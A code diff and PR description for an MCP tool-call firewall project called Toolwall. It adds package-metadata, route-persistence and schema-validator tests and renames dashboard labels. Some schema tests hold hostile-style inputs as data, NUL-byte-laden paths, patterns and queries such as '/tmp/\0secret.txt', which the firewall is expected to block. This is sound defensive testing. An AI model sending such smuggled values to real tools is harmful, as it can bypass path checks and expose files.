@@ -13,6 +13,24 @@ describe('release guardrails', () => {
   it('accepts expected package metadata', () => {
     const mismatches = validatePackageMetadata({
       name: 'mcp-transport-firewall',
+      main: 'dist/lib.js',
+      exports: {
+        '.': './dist/lib.js',
+        './package.json': './package.json',
+      },
+      files: [
+        'dist',
+        'docs',
+        '.env.example',
+        'LICENSE',
+        'README.md',
+        'CHANGELOG.md',
+        'SECURITY.md',
+        'SUPPORT.md',
+      ],
+      bin: {
+        'mcp-transport-firewall': 'dist/cli.js',
+      },
       repository: {
         type: 'git',
         url: 'git+https://github.com/shleder/mcp-transport-firewall.git',
@@ -24,9 +42,61 @@ describe('release guardrails', () => {
       publishConfig: {
         access: 'public',
       },
+      engines: {
+        node: '>=20.0.0',
+      },
+      scripts: {
+        prepare: 'npm run build',
+      },
     });
 
     expect(mismatches).toEqual([]);
+  });
+
+  it('rejects package metadata when the packaging and install contract drifts', () => {
+    const mismatches = validatePackageMetadata({
+      name: 'mcp-transport-firewall',
+      main: 'dist/index.js',
+      exports: {
+        '.': './dist/index.js',
+      },
+      files: [
+        'dist',
+        'README.md',
+      ],
+      bin: {
+        'mcp-transport-firewall': 'dist/index.js',
+      },
+      repository: {
+        type: 'git',
+        url: 'git+https://github.com/shleder/mcp-transport-firewall.git',
+      },
+      homepage: 'https://github.com/shleder/mcp-transport-firewall#readme',
+      bugs: {
+        url: 'https://github.com/shleder/mcp-transport-firewall/issues',
+      },
+      publishConfig: {
+        access: 'public',
+      },
+      engines: {
+        node: '>=18.0.0',
+      },
+      scripts: {},
+    });
+
+    expect(mismatches).toEqual(expect.arrayContaining([
+      'main must be dist/lib.js, got dist/index.js',
+      'exports["."] must be ./dist/lib.js, got ./dist/index.js',
+      'bin.mcp-transport-firewall must be dist/cli.js, got dist/index.js',
+      'engines.node must be >=20.0.0, got >=18.0.0',
+      'scripts.prepare must be npm run build, got undefined',
+      'files must include docs',
+      'files must include .env.example',
+      'files must include LICENSE',
+      'files must include CHANGELOG.md',
+      'files must include SECURITY.md',
+      'files must include SUPPORT.md',
+    ]));
   });
 
   it('rejects package metadata that points to a different homepage', () => {

--- a/tests/router.test.ts
+++ b/tests/router.test.ts
@@ -1,16 +1,29 @@
-import { jest, describe, it, expect, beforeEach, afterEach, beforeAll, afterAll } from '@jest/globals';
-import { registerRoute, removeRoute, getRegisteredRoutes, clearRoutes, routeRequest } from "../src/proxy/router.js";
+import fs from 'node:fs';
+import os from 'node:os';
+import path from 'node:path';
+import { jest, describe, it, expect, beforeEach, afterEach } from '@jest/globals';
+import {
+  clearRoutes,
+  configureRouteRegistryPersistence,
+  disableRouteRegistryPersistence,
+  getRegisteredRoutes,
+  registerRoute,
+  removeRoute,
+  routeRequest,
+} from "../src/proxy/router.js";
 
 describe("router", () => {
   let stderrSpy: jest.SpyInstance;
 
   beforeEach(() => {
     stderrSpy = jest.spyOn(process.stderr, "write").mockImplementation(() => true);
+    disableRouteRegistryPersistence();
     clearRoutes();
   });
 
   afterEach(() => {
     jest.restoreAllMocks();
+    disableRouteRegistryPersistence();
     clearRoutes();
   });
 
@@ -42,6 +55,65 @@ describe("router", () => {
 
     expect(removeRoute("temp_tool")).toBe(true);
     expect(getRegisteredRoutes().has("temp_tool")).toBe(false);
+  });
+
+  it("restores persisted route-registry entries after a restart-style reload", () => {
+    const stateDir = fs.mkdtempSync(path.join(os.tmpdir(), "mcp-route-registry-"));
+
+    try {
+      configureRouteRegistryPersistence(stateDir);
+      registerRoute("search_tool", {
+        url: "https://mcp-server.example.com/search",
+        timeoutMs: 3000,
+      });
+
+      disableRouteRegistryPersistence();
+      clearRoutes();
+      expect(getRegisteredRoutes().size).toBe(0);
+
+      configureRouteRegistryPersistence(stateDir);
+
+      const routes = getRegisteredRoutes();
+      expect(routes.has("search_tool")).toBe(true);
+      expect(routes.get("search_tool")).toEqual({
+        url: "https://mcp-server.example.com/search",
+        timeoutMs: 3000,
+      });
+    } finally {
+      disableRouteRegistryPersistence();
+      clearRoutes();
+      fs.rmSync(stateDir, { recursive: true, force: true });
+    }
+  });
+
+  it("fails closed when the persisted route-registry snapshot is invalid", () => {
+    const stateDir = fs.mkdtempSync(path.join(os.tmpdir(), "mcp-route-registry-invalid-"));
+
+    try {
+      fs.writeFileSync(
+        path.join(stateDir, "route-registry.json"),
+        JSON.stringify({
+          version: 1,
+          routes: {
+            broken_tool: {
+              url: "not-a-url",
+              timeoutMs: 1000,
+            },
+          },
+        }),
+        "utf8",
+      );
+
+      configureRouteRegistryPersistence(stateDir);
+
+      expect(getRegisteredRoutes().size).toBe(0);
+      expect(stderrSpy).toHaveBeenCalled();
+      expect(String(stderrSpy.mock.calls.at(-1)?.[0] ?? "")).toContain("ROUTE_REGISTRY_RESTORE_FAILED");
+    } finally {
+      disableRouteRegistryPersistence();
+      clearRoutes();
+      fs.rmSync(stateDir, { recursive: true, force: true });
+    }
   });
 
   it("returns 403 UNKNOWN_ROUTE for unregistered tools (Fail-Closed)", async () => {

--- a/tests/schema-validator.test.ts
+++ b/tests/schema-validator.test.ts
@@ -29,10 +29,49 @@ function createMockRes(): { res: Partial<Response>; statusCode: number; response
 describe('schema-validator (Progressive Disclosure)', () => {
   const validator = createSchemaValidator(mcpToolSchemas);
 
-  it('allows valid arguments for a registered file tool alias', () => {
+  it.each(['read_file', 'read', 'open_file'])(
+    'allows valid arguments for read-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: { name: toolName, arguments: { path: '/etc/config', encoding: 'utf8', maxBytes: 256 } },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).toHaveBeenCalledTimes(1);
+      expect(res.status).not.toHaveBeenCalled();
+    },
+  );
+
+  it.each(['read_file', 'open_file'])(
+    'blocks invalid path payload for read-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: { name: toolName, arguments: { path: '/tmp/\0secret.txt' } },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).not.toHaveBeenCalled();
+      expect(res.status).toHaveBeenCalledWith(403);
+    },
+  );
+
+  it('allows a strict read_multiple_files payload for common local filesystem workflows', () => {
     const req = createMockReq({
       method: 'tools/call',
-      params: { name: 'read', arguments: { path: '/etc/config', encoding: 'utf8', maxBytes: 256 } },
+      params: {
+        name: 'read_multiple_files',
+        arguments: {
+          paths: ['/workspace/README.md', '/workspace/docs/guide.md'],
+        },
+      },
     });
     const { res } = createMockRes();
     const next = jest.fn();
@@ -42,6 +81,260 @@ describe('schema-validator (Progressive Disclosure)', () => {
     expect(next).toHaveBeenCalledTimes(1);
     expect(res.status).not.toHaveBeenCalled();
   });
+
+  it('blocks read_multiple_files when the paths list is empty', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'read_multiple_files',
+        arguments: {
+          paths: [],
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+  });
+
+  it('allows a strict directory_tree payload', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'directory_tree',
+        arguments: {
+          path: '/workspace/src',
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it('blocks directory_tree when unexpected fields are present', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'directory_tree',
+        arguments: {
+          path: '/workspace/src',
+          recursive: true,
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+  });
+
+  it('allows a strict get_file_info payload', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'get_file_info',
+        arguments: {
+          path: '/workspace/package.json',
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it('blocks get_file_info when unexpected fields are present', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'get_file_info',
+        arguments: {
+          path: '/workspace/package.json',
+          followSymlinks: true,
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+  });
+
+  it('allows list_allowed_directories with an empty payload', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'list_allowed_directories',
+        arguments: {},
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it('blocks list_allowed_directories when unexpected fields are present', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'list_allowed_directories',
+        arguments: {
+          path: '/workspace',
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+  });
+
+  it.each(['list_directory', 'list_files'])(
+    'allows valid arguments for list-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: {
+          name: toolName,
+          arguments: {
+            path: '/workspace',
+            recursive: true,
+            includeHidden: false,
+            maxDepth: 4,
+            pattern: '*.ts',
+          },
+        },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).toHaveBeenCalledTimes(1);
+      expect(res.status).not.toHaveBeenCalled();
+    },
+  );
+
+  it.each(['list_directory', 'list_files'])(
+    'blocks NUL-bearing pattern for list-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: {
+          name: toolName,
+          arguments: {
+            path: '/workspace',
+            pattern: '*.ts\0',
+          },
+        },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).not.toHaveBeenCalled();
+      expect(res.status).toHaveBeenCalledWith(403);
+    },
+  );
+
+  it.each(['search_files', 'search'])(
+    'allows valid arguments for search-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: {
+          name: toolName,
+          arguments: {
+            query: 'TODO',
+            path: '/workspace',
+            include: ['*.ts'],
+            exclude: ['node_modules'],
+            recursive: true,
+            maxResults: 50,
+          },
+        },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).toHaveBeenCalledTimes(1);
+      expect(res.status).not.toHaveBeenCalled();
+    },
+  );
+
+  it.each(['search_files', 'search'])(
+    'blocks NUL-bearing query for search-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: {
+          name: toolName,
+          arguments: {
+            query: 'TODO\0NOW',
+          },
+        },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).not.toHaveBeenCalled();
+      expect(res.status).toHaveBeenCalledWith(403);
+    },
+  );
+
+  it.each(['search_files', 'search'])(
+    'blocks NUL-bearing include patterns for search-style alias %s',
+    (toolName) => {
+      const req = createMockReq({
+        method: 'tools/call',
+        params: {
+          name: toolName,
+          arguments: {
+            query: 'TODO',
+            include: ['src/\0*.ts'],
+          },
+        },
+      });
+      const { res } = createMockRes();
+      const next = jest.fn();
+
+      validator(req as Request, res as Response, next as NextFunction);
+
+      expect(next).not.toHaveBeenCalled();
+      expect(res.status).toHaveBeenCalledWith(403);
+    },
+  );
 
   it('blocks invalid arguments when a strict schema sees an unexpected field', () => {
     const req = createMockReq({

--- a/ui/src/pages/Dashboard.tsx
+++ b/ui/src/pages/Dashboard.tsx
@@ -240,10 +240,10 @@ export default function Dashboard() {
                 <div className="flex items-center justify-between p-3 rounded-lg bg-gray-800/50">
                   <div className="flex items-center gap-3">
                     <Key className="w-5 h-5 text-gray-400" />
-                    <span>NHI Authentication</span>
+                    <span>Shared-Secret Auth</span>
                   </div>
-                  <span className="px-2.5 py-1 rounded-full text-xs font-medium bg-green-500/10 text-green-400">
-                    Active
+                  <span className="px-2.5 py-1 rounded-full text-xs font-medium bg-yellow-500/10 text-yellow-400">
+                    Env-Gated
                   </span>
                 </div>
                 <div className="flex items-center justify-between p-3 rounded-lg bg-gray-800/50">
@@ -407,7 +407,7 @@ export default function Dashboard() {
         </Card>
 
         <footer className="text-center text-gray-600 text-sm pt-4 border-t border-gray-800">
-          <p>MCP Transport Firewall v2.2.2</p>
+          <p>MCP Transport Firewall Admin Dashboard</p>
           <p className="text-xs mt-1">Fail-closed stdio firewall with an HTTP compatibility harness</p>
         </footer>
       </div>

--- a/ui/src/pages/Dashboard.tsx
+++ b/ui/src/pages/Dashboard.tsx
@@ -51,7 +51,7 @@ export default function Dashboard() {
       <div className="min-h-screen bg-gray-950 flex items-center justify-center">
         <div className="text-center">
           <Cpu className="w-12 h-12 text-blue-500 animate-spin mx-auto mb-4" />
-          <p className="text-gray-400">Connecting to transport firewall...</p>
+          <p className="text-gray-400">Connecting to Toolwall...</p>
         </div>
       </div>
     );
@@ -109,8 +109,8 @@ export default function Dashboard() {
           <div className="flex items-center gap-3">
             <Shield className="w-8 h-8 text-blue-500" />
             <div>
-              <h1 className="text-2xl font-bold">MCP Transport Firewall</h1>
-              <p className="text-sm text-gray-400">Fail-Closed Stdio Boundary Enforcement</p>
+              <h1 className="text-2xl font-bold">Toolwall</h1>
+              <p className="text-sm text-gray-400">Fail-closed stdio boundary for local MCP workflows</p>
             </div>
           </div>
           <div className="flex items-center gap-4">
@@ -139,7 +139,7 @@ export default function Dashboard() {
         <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-4">
           <Card className="bg-gray-900 border-gray-800">
             <CardHeader className="flex flex-row items-center justify-between pb-2">
-              <CardTitle className="text-sm font-medium text-gray-400">HTTP Review Routes</CardTitle>
+              <CardTitle className="text-sm font-medium text-gray-400">HTTP Tool Routes</CardTitle>
               <Server className="w-4 h-4 text-gray-500" />
             </CardHeader>
             <CardContent>
@@ -258,7 +258,7 @@ export default function Dashboard() {
                 <div className="flex items-center justify-between p-3 rounded-lg bg-gray-800/50">
                   <div className="flex items-center gap-3">
                     <Zap className="w-5 h-5 text-gray-400" />
-                    <span>Epistemic Egress Filter</span>
+                    <span>Semantic Egress Filter</span>
                   </div>
                   <span className="px-2.5 py-1 rounded-full text-xs font-medium bg-green-500/10 text-green-400">
                     Active
@@ -407,8 +407,8 @@ export default function Dashboard() {
         </Card>
 
         <footer className="text-center text-gray-600 text-sm pt-4 border-t border-gray-800">
-          <p>MCP Transport Firewall Admin Dashboard</p>
-          <p className="text-xs mt-1">Fail-closed stdio firewall with an HTTP compatibility harness</p>
+          <p>Toolwall admin dashboard</p>
+          <p className="text-xs mt-1">Technical package and CLI identity: mcp-transport-firewall</p>
         </footer>
       </div>
     </div>


### PR DESCRIPTION
This PR publishes the current local-only project/tests-first-quality stack as one review boundary.

It converges the branch around the flagship local filesystem/search workflow over stdio: stronger packaged install-contract proof, packaged proxy smoke coverage, high-trust preflight hardening, expanded safe filesystem sibling schema coverage, repeated short-chunk ShadowLeak blocking, restart-durable secondary route registration, and repo-surface truth-sync for the README/proof docs.

The motivation here is to stop carrying this work as fragmented local-only packets and move it to one externally reviewable branch boundary without adding another implementation batch. The repo-facing story stays explicit about public/current versus local-only, keeps Toolwall as a display-name surface only, and preserves mcp-transport-firewall as the package, repo, CLI, and env-contract identity.

I intentionally did not fold in the rest of project/naming-and-ci-discipline, because the workflow display-name and artifact rename pieces add churn without improving the correctness of this review boundary.

Reviewer context:
- public/current is still npm 2.2.5, GitHub release v2.2.5, and origin/main at 597c7e3
- this PR is the unpublished local stack that sits ahead of main by 14 commits
- the primary story is still one protected local filesystem/search MCP workflow over stdio
- this PR is not a release, tag, npm publish, or technical rename batch

Local verification on the final HEAD is green:
- npm test (15 suites / 119 tests)
- npm run demo:stdio
- npm run pack:smoke
- npm run benchmark:stdio -- --json --output evidence.json
  - 19 cases
  - 24 requests
  - 0 false positives
  - 0 false negatives
  - 0 cache consistency failures

Reviewer guide:

Review order:
- README.md
- docs/CURRENT_STATE_GROUNDED.md
- LOCAL_NOT_PUSHED_TO_GITHUB.md
- tests/package-proxy-smoke.test.ts
- tests/preflight-validator.test.ts
- tests/schema-validator.test.ts
- tests/ast-egress-filter.test.ts
- tests/router.test.ts
- src/middleware/preflight-validator.ts
- src/mcp-tool-schemas.ts
- src/middleware/ast-egress-filter.ts
- src/proxy/router.ts
- scripts/assert-package-metadata.mjs
- .github/workflows/package-smoke.yml

Risky areas:
- tightened preflight enforcement for default-high-trust and blue tools
- expanded schema coverage for safe filesystem sibling tools
- repeated short-chunk ShadowLeak detection sensitivity
- restart persistence of the secondary HTTP/admin route registry

Deferred items:
- package/repo/bin/env-var rename
- workflow display-name changes and benchmark-artifact rename from project/naming-and-ci-discipline
- release/tag/npm publish
- broader Toolwall rollout
- monetization/support-surface work